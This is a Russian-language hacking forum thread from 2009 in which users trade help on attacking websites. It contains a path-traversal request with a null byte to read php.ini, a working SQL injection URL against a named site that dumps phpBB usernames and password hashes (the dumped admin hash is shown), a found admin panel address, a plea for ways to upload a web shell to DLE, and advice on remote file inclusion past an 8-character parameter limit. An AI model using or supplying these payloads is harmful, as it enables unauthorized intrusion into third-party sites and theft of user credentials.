04.04.2009, 22:02
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Эм...а куда ты его подключаешь?
дай код!
Последний раз редактировалось -m0rgan-; 04.04.2009 в 22:04..
|
|
|
04.04.2009, 22:23
|
|
Новичок
Регистрация: 16.03.2009
Сообщений: 24
С нами:
9029267
Репутация:
2
|
|
в принципе я делаю только вот такой запрос
http://www.sitename.com/scriptname.php?param=../../../../../../../../../../../usr/local/lib/php.ini%00
|
|
|
|
04.04.2009, 22:44
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
забыл каким образом можно выводит все содержание папки , а не пользуясь LIMIT 1,1 .....
|
|
|
|
04.04.2009, 22:51
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
2 Saiga
Можно воспользуватся функцией group_concat()
Код:
http://www.so-znanie.com/index.php?id=-8+union+all+select+1,2,group_concat(concat_ws(0x3a3a,username,user_password))+from+phpbb_users--
Код:
Anonymous::,admin::$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21,AdsBot [Google]::,Alexa [Bot]::,Alta Vista [Bot]::,Ask Jeeves [Bot]::,Baidu [Spider]::,Exabot [Bot]::,FAST Enterprise [Crawler]::,FAST WebCrawler [Crawler]::,Francis [Bot]::,Gigabot [Bot]::,Google Adsense [Bot]::,Google Desktop::,Google Feedfetcher::,Google [Bot]::,Heise IT-Markt [Crawler]::,Heritrix [Crawler]::,IBM Research [Bot]::,ICCrawler - ICjobs::,ichiro [Crawler]::,Majestic-12 [Bot]::,Metager [Bot]::,MSN NewsBlogs::,MSN [Bot]::,MSNbot Media::,NG-Search [Bot]::,Nutch [Bot]::,Nutch/CVS [Bot]::,OmniExplorer [Bot]::,Online link [Validator]::,psbot [Picsearch]::,Seekport [Bot]::,Sensis [Crawler]::,SEO Crawler::,Seoma [Crawler]::,SEOSearch [Crawler]::,Snappy [Bot]::,Steeler [Crawler]::,Synoo [Bot]::,Telekom [Bot]::,TurnitinBot [Bot]::,Voyager [Bot]::,W3 [Sitesearch]::,W3C [Linkcheck]::,W3C [Validator]::,WiseNut [Bot]::,YaCy [Bot]::,Yahoo MMCrawler [Bot]::,Yahoo Slurp [Bot]::,Yahoo [Bot]::,YahooSeeker [Bot]::,Виталий::$H$9hSsjxJ2UF5iUD8kzntbWpyPoXfE
Там ботов больше чем людей =))
Последний раз редактировалось -m0rgan-; 04.04.2009 в 22:56..
|
|
|
|
04.04.2009, 22:57
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
group_concat() всех не выведеш
|
|
|
|
04.04.2009, 23:43
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Дорогие отвечающие на вопросы!!!
Я уже несколько раз говорил, что если уж вы отвечаете на вопросы не надо писать ОХИНЕЮ и разводить флуд и оффтоп на 15 страниц.
Человек искал админку ат сайта, имея пасс от него. Вот пост НОРМАЛЬНОГО ответа по теме:
Сообщение от DimOnOID
Код:
http://so-znanie.com/backend/main.php
И весь этот ОФФТОП на несколько страниц, а результата нет и не предвидится.
И так по каждому вопросу. На будующее, такую бессмысленную активность буду расценивать как флуд и набивание постов и реагировать на неё согласно правилам форума.
Сюда-же попадает ОХИНЕЯ, которую некоторые несут с завидной регулярностью.
Если вы не уверены в ответе, отвечать НЕ НУЖНО.
Если человек просит подсказать есть ли скуль, НЕ НАДО писать, что там расскрытие пути, сдесь нет слепых юзеров. Не надо сюда копипастить милворм, в лучшем случае ссылку на сплоит. Не надо показавать свою некомпетентность, я вам со всей ответственностью могу заявить, что такого рода активность не пойдёт вам в зачёт, она напротив только показывает отсутствие знаний.
Надеюсь , что все меня поняли правильно, утопить топик во флуде я не дам, весь оффтоп буду жестко пресекать
Спасибо за внимание
|
|
|
|
05.04.2009, 02:22
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
С нами:
9330638
Репутация:
93
|
|
челы резко встал вопрос залития шелла в dle
1. изменил тип файлов, залил через новость.. но я незнаю названия файла..
2. через шаблон пхп не исполняется..
подскажи еще способы.. очень прошу - нужно!
|
|
|
|
05.04.2009, 17:23
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 44
С нами:
9274683
Репутация:
32
|
|
народ, помогите.
есть сайт www.sait.ru
скрипт www.sait.ru/text.php имхо бажный. методом GET передаются два параметра p & n
генерация страницы просиходит примерно следующим образом
$path = substr($_GET['p'],0,8)."/".substr($_GET['n'],0,8).'.htm';
///
$x = fopen($path, 'w');
///
require($path);
если в корне лежит title.htm, то при www.sait.ru/text.php?p=news&n=../title
выведет ее.
одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти?? в корне также лежит .passwd Никак не могу его вывести, т.к. он считает и %00, и название файла получается больше 8 символов, это бесит.. я не знаю как убрать слеш, чтоб ввести название двумя параметрами... Также не могу исполнить там свой скрипт с другого хоста.. пробовал www.sait.ru/text.php?p=http:/&n=moysait.ru/code.php%00
но никак не укладываюсь в 8 символов.
заранее спасибо
|
|
|
|
05.04.2009, 17:44
|
|
Постоянный
Регистрация: 24.03.2009
Сообщений: 670
С нами:
9017461
Репутация:
414
|
|
одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти??
никак.
|
|
|
|
05.04.2009, 18:21
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
joks, у тебя ведь 2 параметра? если так, то
пусть p = http:/
n = abc.ru/a
тогда path = http://abc.ru/a.htm
осталось найти трехбуквенник ру
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
